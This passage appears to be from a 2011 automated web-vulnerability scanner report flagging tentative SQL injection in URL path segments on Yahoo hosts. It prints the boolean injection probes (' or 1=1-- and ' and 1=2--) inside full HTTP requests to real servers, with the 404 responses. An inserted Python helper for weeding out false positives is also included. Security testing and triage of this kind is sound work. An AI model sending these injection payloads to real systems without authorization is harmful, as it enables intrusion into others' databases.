Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 41506506'%20or%201%3d1--%20 and 41506506'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets41506506'%20or%201%3d1--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3807


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
1311&url=Yahoo!+Sports+assets41506506+39+or+1+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl+q29ccnbesingepfeqkkcbxmyjqxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a
...[SNIP]...

Request 2

GET /j/assets41506506'%20or%201%3d2--%20/eJx1UtluwyAQ_KLEHAZs9WMQxpsYxWYtINffF4PTJpX6BMzMHrOLjbF5Xl0TIEI6nNCneDgHN0bNjvRIjoG2nDH6ZbPO4rKgbwYTIeNCCaEKHlcMKW5QL4QsEDxWqNhv-DqbJwQdwQQ7ZUbxlvU1gcUAaXL-Q29CcnbeSinGePfeQkKcBxMyJQXl_J3aDvB_St_cCFgSvdR7Mx4TlM4V4W0hnEW_IZLKPfinu5dzxWQvKlW8aBOji6lZnHf1qhkhPekYoZJ3W3opKSsRJzDpGmDUw4znUidzH95GF-2MMYu2wJZ2dUarsxdYNIwuYdDbq0SrVu0zdAnu2ab25qYnMGN2d8JsL9RR7_b2Is-4HhYcX2eRMMn-kwz4KFPYdfva0Toz6-GaUh2Z6GRL_0thJ7CXsmEpGalLuKMpH4H0nH4DlFncJQ,,.css?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:05:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3780


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ericks_win_nba_finals_061311&url=Yahoo!+Sports+assets41506506+39+or+1+2+ejx1utluwyaq+klehazs9wmqxpsyxwytinfff4ptjpx6bmzmhroljbf5xl0tiei6nncnedghn0bnjvrijog2ndh6zbpo4rkgbwytienccaekhlcmkw5ql4qsedxwqnhv+dqbjwqdwqq7zubxlvu1gcuaaxl'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hr
...[SNIP]...
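A triage helper for the manual review the issue detail asks for, added here and not part of the scanner report. For a 1=1 / 1=2 pair it blanks every place the payload itself was echoed back and then compares what remains, so that two not-found pages whose only visible difference is the payload echoed into the 404 handler's redirect URL (the pattern in this instance, where the scanner injected into a CDN path and got Yahoo's 404 page both times) are separated from a pair like 1.1, where the 1=1 response carries extra player parameters. The sample responses are constructed for the example, cut down from the report's pages rather than copied byte for byte, and `plus_words` is a constructed stand-in for how a search-style 404 handler rewrites the requested path; the real Yahoo handler also renders the apostrophe as 39, which the helper does not model, so echo forms observed for the server under test are passed in via `extra`.

```python
"""
Added triage helper, not part of the scanner report. For a 1=1 / 1=2
response pair it blanks every place the payload itself was echoed back and
then compares what remains, so a difference caused only by the echo (the
404 pages in 1.2 and 1.3) is told apart from a difference in the page's
actual content (the extra player parameters in 1.1). The sample responses
are constructed for the example, cut down from the report's pages rather
than copied byte for byte, and `plus_words` is a constructed stand-in for
how a search-style 404 handler rewrites the requested path.
"""
import difflib
import re
import urllib.parse


def plus_words(payload):
    """Constructed echo rule: decode, keep alphanumeric runs, join with '+'.
    Real handlers differ (Yahoo's renders the apostrophe as 39), so pass the
    forms you observe through `extra` rather than relying on this alone."""
    decoded = urllib.parse.unquote(payload)
    return "+".join(t for t in re.split(r"[^A-Za-z0-9]+", decoded) if t).lower()


def echo_forms(payload, extra=()):
    """Forms in which the payload may appear in a response: raw, decoded,
    the '+'-joined search form, plus any forms observed for this server."""
    return {payload, urllib.parse.unquote(payload), plus_words(payload), *extra}


def blank_payload(body, payload, extra=()):
    """Replace every echoed form of the payload with one fixed marker,
    longest forms first so a short form never breaks a longer one."""
    for form in sorted(echo_forms(payload, extra), key=len, reverse=True):
        body = body.replace(form, "<PAYLOAD>")
    return body


def triage(status_a, body_a, payload_a, status_b, body_b, payload_b, extra=()):
    """Classify a difference-based SQLi hit for manual review."""
    if status_a != status_b:
        return "status differs: likely real, confirm by hand"
    norm_a = blank_payload(body_a, payload_a, extra)
    norm_b = blank_payload(body_b, payload_b, extra)
    if norm_a == norm_b:
        return "only the echoed payload differs: likely false positive"
    ratio = difflib.SequenceMatcher(None, norm_a, norm_b).ratio()
    return f"content differs beyond the echo (similarity {ratio:.2f}): review"


# Constructed pair modelled on 1.2: Yahoo's not-found page, where the only
# difference is the payload echoed into the 404 handler's redirect URL.
PAY_T = "41506506'%20or%201%3d1--%20"
PAY_F = "41506506'%20or%201%3d2--%20"
NOT_FOUND = ("<html><head><title>Yahoo!</title><script>document.location = "
             "'http://search.yahoo.com/404handler?src=sports&url=Yahoo!+Sports"
             "+assets{echo}+ejx1utluwyaq'</script></head><body>"
             "<h1>Sorry, the page you requested was not found.</h1></body></html>")


def sample_404_pair():
    return (404, NOT_FOUND.format(echo=plus_words(PAY_T)), PAY_T,
            404, NOT_FOUND.format(echo=plus_words(PAY_F)), PAY_F)


# Constructed pair modelled on 1.1: same ad-preview template, but the 1=1
# response carries autoPlay/maxAds/pauseBetweenAds that the 1=2 one lacks.
SITE_T = "24bbcd13d37379'%20and%201%3d1--%20"
SITE_F = "24bbcd13d37379'%20and%201%3d2--%20"
PREVIEW = ("<html><head><title>Jivox Ad Preview</title></head><body><script>"
           "load('iabplayer.php?siteId={echo}&campaignId=19093{extra}')"
           "</script></body></html>")


def sample_200_pair():
    extra = "%26autoPlay%3Dtrue%26maxAds%3D3%26pauseBetweenAds%3D1000"
    return (200, PREVIEW.format(echo=SITE_T, extra=extra), SITE_T,
            200, PREVIEW.format(echo=SITE_F, extra=""), SITE_F)


if __name__ == "__main__":
    print("1.2-style pair:", triage(*sample_404_pair()))
    print("1.1-style pair:", triage(*sample_200_pair()))
```

The status check comes first because a 404 for both payloads, as in this instance, already says the path never reached an application handler that could have run a query; the content comparison only matters once both responses come from the same code path. A "false positive" verdict here is a triage hint for the reviewer, not proof of absence.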

1.3. http://l.yimg.com/j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.yimg.com
Path:   /j/assets/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19026485'%20or%201%3d1--%20 and 19026485'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /j/assets19026485'%20or%201%3d1--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3740


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ws%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek+ly2nnmsrvuyaltngrb6gv8ld'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a hre
...[SNIP]...

Request 2

GET /j/assets19026485'%20or%201%3d2--%20/eJx9UtuOgyAU_CJvXFSyH2NOkba0yDGA27hfv4BNVpO6T-LMnGEYePhqXXRFyq6s08ogjMoVk7alaxglpPl67CUjTuek-lY2nNMSrVUyaLTnGrB6gv8lD_-ZpSXdzvAmeddTnkivwMn7AN5rH6pI6m05kLoWdU_qpqX93i0G9QFs8BFsWdRklxldRhjnffYNcPHHMXxqlZCu5ywh4IKWJkOiafLQS9sRX_sxL9GpcD8eaAILN-UO9uBw8crsscWE_e9sYFVu2A58jDZNaKvVz8WEY_5uWotBFX-bccJFHhi1lwb94lL4tunY1gFKDWa4LCHEihLTv9txMOsxG3SMf0j2IcAVpLrEyqKsqymjJzJ5V_KZy2k5ZeJEpZUoZm2L4CCpb9k0XtSJ3MDPuj31JCRCZOHVrLik2F2Mc7bT7hriC9vaeiGkurkgov0FgL4UpA,,.js?z&m HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nba/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:06:23 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 3717


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://searc
...[SNIP]...
ref=http%3A%2F%2Fsports.yahoo.com%2Fnba%2Fnews%3Fslug%3Daw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311&url=Yahoo!+Sports+assets19026485+39+or+1+2+ejx9utuogyau+cjvxfsyh2nokba0ydga27hfv4bnvpo6t+lmngeyephqxxrfyq6s08ogjmovk7alaxglppl67cujtuek'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a l
...[SNIP]...

1.4. http://sports.yahoo.com/nba/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sports.yahoo.com
Path:   /nba/news

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba'%20and%201%3d1--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3530


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+news+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
...[SNIP]...

Request 2

GET /nba'%20and%201%3d2--%20/news?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
